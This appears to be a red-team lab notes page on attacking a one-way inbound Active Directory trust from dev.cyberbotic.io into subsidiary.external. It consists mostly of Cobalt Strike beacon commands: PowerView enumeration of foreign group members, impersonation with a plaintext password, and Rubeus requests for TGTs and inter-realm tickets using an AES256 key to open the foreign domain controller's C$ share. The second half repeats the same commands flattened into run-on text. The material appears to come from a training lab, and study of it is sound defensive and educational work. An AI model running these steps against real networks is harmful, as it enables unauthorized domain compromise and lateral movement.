One Way (Inbound)

dev.cyberbotic.io has a one-way inbound trust with subsidiary.external.

beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : subsidiary.external
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

beacon> powershell Get-DomainComputer -Domain subsidiary.external -Properties DNSHostName

dnshostname           
-----------           
ad.subsidiary.external

SharpHound -c DcOnly -d subsidiary.external

Enumerate Foreigners Users

beacon> powershell Get-DomainForeignGroupMember -Domain subsidiary.external

beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\Subsidiary Admins

# Validated the previous
beacon> powershell Get-NetLocalGroupMember -ComputerName ad.subsidiary.external

ComputerName : ad.subsidiary.external
GroupName    : Administrators
MemberName   : DEV\Subsidiary Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

Authenticate using domain username and password

beacon> powershell Get-DomainGroupMember -Identity "Subsidiary Admins" | select MemberName

MemberName
----------
jadams

beacon> make_token DEV\jadams TrustNo1
[+] Impersonated DEV\bfarmer

beacon> ls \\ad.subsidiary.external\c$

Authenticate using kerberos tickets

# request tgt from the current domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jadams /domain:dev.cyberbotic.io /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# request tgs from the current domain to the external domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:krbtgt/subsidiary.external /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFdD[...snip...]MuSU8= /nowrap

# request tgs using the previous tgs to the external domain and service
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:cifs/ad.subsidiary.external /domain:ad.subsidiary.external /dc:ad.subsidiary.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Store the ticket
PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\subsidiary.kirbi", [System.Convert]::FromBase64String("doIFiD [...snip...] 5hbA=="))

beacon> make_token DEV\jadams FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Daniel\Desktop\subsidiary.kirbi
beacon> ls \\ad.subsidiary.external\c$

beacon> rev2self

PreviousParent/Child NextOne Way (Outbound)

Last updated 3 years ago

beacon> powershell Get-DomainTrust SourceName : dev.cyberbotic.io TargetName : subsidiary.external TrustType : WINDOWS_ACTIVE_DIRECTORY TrustAttributes : TrustDirection : Inbound WhenCreated : 2/19/2021 10:50:56 PM WhenChanged : 2/19/2021 10:50:56 PM

beacon> powershell Get-DomainComputer -Domain subsidiary.external -Properties DNSHostName dnshostname ----------- ad.subsidiary.external SharpHound -c DcOnly -d subsidiary.external

# Validated the previous beacon> powershell Get-NetLocalGroupMember -ComputerName ad.subsidiary.external ComputerName : ad.subsidiary.external GroupName : Administrators MemberName : DEV\Subsidiary Admins SID : S-1-5-21-3263068140-2042698922-2891547269-1133 IsGroup : True IsDomain : True

beacon> powershell Get-DomainGroupMember -Identity "Subsidiary Admins" | select MemberName MemberName ---------- jadams beacon> make_token DEV\jadams TrustNo1 [+] Impersonated DEV\bfarmer beacon> ls \\ad.subsidiary.external\c$

# request tgt from the current domain beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jadams /domain:dev.cyberbotic.io /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# request tgs from the current domain to the external domain beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:krbtgt/subsidiary.external /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFdD[...snip...]MuSU8= /nowrap

# request tgs using the previous tgs to the external domain and service beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:cifs/ad.subsidiary.external /domain:ad.subsidiary.external /dc:ad.subsidiary.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Store the ticket PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\subsidiary.kirbi", [System.Convert]::FromBase64String("doIFiD [...snip...] 5hbA==")) beacon> make_token DEV\jadams FakePass [+] Impersonated DEV\bfarmer beacon> kerberos_ticket_use C:\Users\Daniel\Desktop\subsidiary.kirbi beacon> ls \\ad.subsidiary.external\c$ beacon> rev2self